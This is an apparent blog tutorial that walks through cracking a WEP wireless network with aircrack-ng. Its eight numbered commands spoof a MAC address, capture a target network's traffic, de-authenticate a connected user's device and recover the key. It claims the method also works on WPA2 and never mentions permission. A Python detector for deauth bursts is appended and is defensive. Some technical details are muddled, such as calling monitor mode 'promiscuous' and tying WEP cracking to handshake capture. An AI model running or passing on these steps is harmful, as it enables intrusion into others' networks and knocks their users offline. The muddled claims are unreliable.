HACK: WEP Wireless Network

I am aware that finding a wireless network with WEP authentication is impossible these days, but believe me, some people still use it. This tutorial is about breaking a WEP wireless network, but you can use this approach to break WPA2 authentication as well (obviously with a little more effort).

All you need is the Kali operating system. If it is installed on a laptop, your default wireless adapter will work. If you are installing it in a virtual machine, you need an external wireless adapter, because the virtual machine's bridge mode will not work in promiscuous mode.


Step 1: airmon-ng stop wlan0

Step 2: ifconfig wlan0 down

Step 3: macchanger --mac 00:01:02:03:04:05 wlan0

Step 4: airmon-ng start wlan0

These steps put your wireless adapter into promiscuous mode. The next thing is to dump the data of all available wireless connections.

Step 5: airodump-ng mon0

This command lists all wireless connections with their channel number, network details, BSSID, etc. Note down the BSSID and channel number of the WEP network.

The next step is to dump the data of our target wireless network into a file. Suppose the channel number of our WEP network is 3 and its BSSID is 94:44:52:07:9D:AB.

Step 6: airodump-ng -c 3 --bssid 94:44:52:07:9D:AB -w target.cap mon0

Though it is clear from the command, -c is the channel, -w is the prefix for the file name, and mon0 is the monitoring mode of wlan0.

To crack any wireless network you need to capture the authentication packet in a file. To do that, you need to target users who are connected to the wireless network. Suppose a user with MAC address 5C:95:AE:18:B5:4E is connected to our target wireless network; to de-authenticate that machine you need to run:

Step 7: aireplay-ng --deauth 5 -a 94:44:52:07:9D:AB -c 5C:95:AE:18:B5:4E mon0

aireplay-ng is used to inject packets into a wireless network. --deauth 5 means we are sending 5 de-authentication packets, -a is the target access point, and -c sets the destination MAC address.

Repeat Step 7 a couple of times, then stop the command from Step 6. The final step is to get the password from the captured file; for this we will use the aircrack command.

Step 8: aircrack-ng target.cap -0

If you are targeting a WEP network, aircrack will easily break the password within a few minutes.
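On the network owner's side, the repeated de-authentication bursts from Step 7 are the part of this procedure a monitoring sensor can see. The following is an added example, not part of the original tutorial: a sliding-window detector that flags bursts of deauth frames aimed at one client. The log format, the 10-second window and the threshold of 5 are assumptions, and the sample records are constructed from the addresses used above.

```python
from collections import defaultdict, deque

# Constructed sample records: "<seconds> <frame subtype> <bssid> <destination>".
SAMPLE_LOG = """
50 deauth 94:44:52:07:9D:AB 02:00:00:00:00:01
99 beacon 94:44:52:07:9D:AB FF:FF:FF:FF:FF:FF
100 deauth 94:44:52:07:9D:AB 5C:95:AE:18:B5:4E
101 deauth 94:44:52:07:9D:AB 5C:95:AE:18:B5:4E
102 deauth 94:44:52:07:9D:AB 5C:95:AE:18:B5:4E
103 deauth 94:44:52:07:9D:AB 5C:95:AE:18:B5:4E
104 deauth 94:44:52:07:9D:AB 5C:95:AE:18:B5:4E
130 deauth 94:44:52:07:9D:AB 5C:95:AE:18:B5:4E
131 deauth 94:44:52:07:9D:AB 5C:95:AE:18:B5:4E
132 deauth 94:44:52:07:9D:AB 5C:95:AE:18:B5:4E
133 deauth 94:44:52:07:9D:AB 5C:95:AE:18:B5:4E
134 deauth 94:44:52:07:9D:AB 5C:95:AE:18:B5:4E
"""

def parse_records(text):
    """Yield (timestamp, subtype, bssid, destination) from the assumed log format."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip blank or malformed lines
        ts, subtype, bssid, dst = parts
        yield float(ts), subtype.lower(), bssid.upper(), dst.upper()

def detect_deauth_bursts(records, window=10.0, threshold=5):
    """Alert once per burst when one (bssid, client) pair sees >= threshold deauths."""
    recent = defaultdict(deque)   # (bssid, client) -> deauth timestamps inside the window
    alerting = set()              # pairs currently above threshold (suppresses repeats)
    alerts = []
    for ts, subtype, bssid, dst in records:
        if subtype != "deauth":
            continue
        key, q = (bssid, dst), recent[(bssid, dst)]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()           # drop frames that fell out of the window
        if len(q) < threshold:
            alerting.discard(key)  # burst ended; a later burst alerts again
        elif key not in alerting:
            alerting.add(key)
            alerts.append({"bssid": bssid, "client": dst, "time": ts, "count": len(q)})
    return alerts

if __name__ == "__main__":
    for alert in detect_deauth_bursts(parse_records(SAMPLE_LOG)):
        print(alert)
```

The single deauth at second 50 stays below the threshold, while each of the two bursts raises one alert.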

Thanks
Abhishek.